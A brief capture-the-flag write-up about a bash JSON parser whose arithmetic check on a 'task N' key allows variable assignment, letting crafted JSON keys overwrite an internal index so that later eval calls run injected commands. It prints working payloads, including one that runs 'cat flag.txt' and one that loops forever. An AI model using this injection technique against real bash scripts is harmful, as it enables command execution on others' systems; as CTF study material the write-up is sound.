Tags: bash 

Rating: 3.0

After looking carefully at the code, in parser.sh:

parseString() {
local input=$1
local i=$2
local res=$3
declare -Ag $res

eval ${res}'[_type]=$var_name'
makeKind "STRING" $var_name

getString "$input" "$i" "$res"

local task_i
local result_str="${!res}"
for (( task_i=0; task_i < ${#result_str}; task_i++ )); do
if [[ "${result_str:$task_i:5}" = "task " ]]; then
local suffix="${result_str:$((task_i+5)):$((${#result_str}-task_i-5))}"
if [[ "$((suffix > 0))" = "1" && "$((suffix <= 8))" = "1" ]]; then
local color=$var_name
normalizeNumber "$suffix" $color "var_"
eval ${res}'[_color]=${color}'
in particular this line:

if [[ "$((suffix > 0))" = "1" && "$((suffix <= 8))" = "1" ]]; then

after fuzzying around, we noticed that allows arithmetic assignment, by attempting to use this line:

{"task 1=12":"as"}

Then we used this vulnerability to rewrite `_var_name_i` in such a way that some new variables used in evals would be somehow "double referenced".

We ended up in :

["task _var_name_i=10","var_11","task _var_name_i=10",{"task _var_name_i=13":"=SHELL","var_10":"b"},"concat",{"ta":["ta","aT","task _var_name_i=10",{"task _var_name_i=13":"};cat flag.txt;{","var_12":"b"},"l00p"]}]

Which, after a more accurate analysis by @zommiommy, could also be written as:

{"task _var_name_i=10":"};cat flag.txt;#

Curiously, changing the value of ` _var_name_i` could also cause the program to loop forever:

{"going":["down","task _var_name_i=10",{"the":"rabbit"},"hole"]}